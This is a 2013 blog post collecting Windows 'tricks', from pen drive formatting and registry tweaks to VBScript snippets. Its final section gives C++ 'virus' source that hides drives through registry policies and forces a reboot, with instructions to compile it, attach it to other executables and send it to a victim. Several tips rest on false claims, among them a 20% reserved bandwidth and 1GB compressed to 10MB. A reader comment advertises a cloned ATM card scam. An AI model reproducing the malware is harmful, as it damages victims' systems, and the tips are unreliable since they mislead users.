Wednesday, 21 August 2013

Some of The Tricks 2

If your Pen Drive File Transfering speed is slow
here is the way to speed up the coping files on pen drive

> Connect your pen drive
> go to "my Computer"
> Right Click on "Removable device" which is your Pen Drive letter
> Now Select the Last Option that is "Properties"
> Go to "Tools" option
> Select "check disk error" and Click OK
> Now Again Right Click on your Pen drive and Select "Format" option
> Click on "Default value"
> uncheck (unmark) the "Quick Format" option
> Click on Format




Increase internet speed by 20% without any software – 

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc. By unreserving this bandwidth, you can make your internet connection faster. By 20%. The steps to do so are – 

1. Click Start then Run and type "gpedit.msc" without quotes.

2. Then go to Local Computer Policy>Computer Configuration>Administrative Templetes>Network>QoS Packet Scheduler. Click on QoS Packet Scheduler. In the right side , find Limit Reservable Bandwidth and double click on Limit Reservable Bandwidth.

3. It will say it is not configured but the truth is under the ‘Explain’ tab. Select ‘Enable’ and set reservable bandwidth to zero. 

4. Click on ‘Apply’ and your internet speed will boost up by 20%.





**Log in to any site you want**

Some sites require registration to show a page or download a file
but it takes time to make an account and then to verify it,
here is the solution BugMeNot: a site where you can find already made accounts for most websites.
It is to easy :

1. go to bugmenot. com

2.search the site you want in the search box.

3. get accounts and username directly

N.B. : These accounts are public so do not be selfish and change the password.  





-: Improve Windows-XP Shutdown Speed :-
*******************************

This tweak reduces the time Windows-XP waits before automatically closing any running programs when you give it the command to shutdown.

Follow the steps as given below-

1) Go to Start then select Run 

2) Type 'Regedit' and click ok 

3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop\' 

4) Select 'WaitToKillAppTimeout' 

5) Right click and select 'Modify' 

6) Change the value to '1000' 

7) Click 'OK' 

 Now select 'HungAppTimeout' 

9) Right click and select 'Modify' 

10) Change the value to '1000' 

11) Click 'OK'







COMPRESS 1GB TO 10MB..!! ...!!
*********************

ITS SO EASY..I just used a software named KGB Archiver.

About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryptionknown for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.

Its strength: Very high compression power with very accurate results and no loss of data.

Its weekness: Due to high compression , the time required to compress and decompress the file is high. High system requirement

GET IT FROM HERE .



#4in 

* Share For More  
*tested On Windows 8





How to change Change Windows Admin password

Guys, today i am gonna each you how to change the windows admin password. Just follow the simple instructions given below.

Here is the simple method:-

Go to Run-> type 'lusrmgr.msc' without quotes
There u will see admin or administrator.
Right click on it and select set password.
Type the desired password twice and you are done! 

Tested on Windows XP and Vista. Working Perfectly.






Increase your RAM and so system speed

1). Start any application, say Word.
Open some large documents.


2). Press CTRL+SHIFT+ESC to open
Windows Task Manager and click
Processes tab and sort the list in
descending order on Mem Usage. You
will notice that WINWORD.EXE will be
somewhere at the top, using multiple
MBs of memory.


3). Now switch to Word and simply
minimize it. (Don't use the Minimize
All Windows option of the task bar).


4). Now go back to the Windows Task
Manager and see where
WINWORD.EXE is listed. Most
probably you will not find it at the
top. You will typically have to scroll
to the bottom of the list to find
Word. Now check out the amount of
RAM it is using. Surprised? The
memory utilization has reduced by a
huge amount.


5). Minimize each application that
you are currently not working on by
clicking on the Minimize button &
you can increase the amount of
available RAM by a substantial
margin. Depending upon the number
and type of applications you use
together, the difference can be as
much as 50 percent of extra RAM.
In any multitasking system,
minimizing an application means that
it won't be utilized by the user right
now. Therefore, the OS automatically
makes the application use virtual
memory & keeps bare minimum
amounts of the code in physical
RAM...




To clean ur RAM
very easly


open
>NOTEPAD
>type
FREEMEM=SPACE(64000000)
>save it with name-
ram.vbs
>now run the script
>ur Pc speed increase




How to find the “real” IP address of a web site?

You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.

To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.

Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter:






convert text to speech without any software !!!

1. open notepad and copy this
2. Dim msg, sapi
msg=InputBox("Enter your
text","Talk it")
Set sapi=CreateObject
("sapi.spvoice")
sapi.Speak msg
'+-> Learn Programming <-+
3. Now save this file with any
name with .vbs extension.
This creates a VBscript file. When
you open this file, it prompts for
text. Enter your text and click
OK .Now you can hear it ..
Enjoy .. !!






C++ Virus Code :

BEFORE YOU START PLEASE NOTE:
THIS PROGRAM IS ONLY FOR
TUTORIAL PURPOSE. WE ARE NOT
RESPONSIBLE FOR DAMAGE CAUSED
BY THE PROGRAM.
#include<windows.h>
#include<fstream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write("C:\\WINDOWS\
\system32\\HackingStar.bat"); /
*opening or creating new file
with .bat extension*/
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoDrives /t REG_DWORD /d 12\n";
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoViewonDrive /t REG_DWORD /d
12\n";
write<<"shutdown -r -c \"Sorry
Your System is hacked by us!\" -
f"<<"\n";
write.close(); //close file
ShellExecute(NULL,"open","C:\
\WINDOWS\\system32\
\HackingStar.bat",NULL,NULL,SW_SHOWNORMAL);
return 0;
}
Copy the above code and paste in
notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will
attack your system itself.
Copy the created .exe file and
send it to your victim. You can
also attach it with any other
exe files.

1 comment:

  1. I was searching for loan to sort out my bills& debts, then i saw comments about a programmed cloned ATM card that can be used to hack and withdraw money from any ATM machines around you . I doubted at first but thus decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shocked to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com whatsapp/t: +1(213)785-1553

    ReplyDelete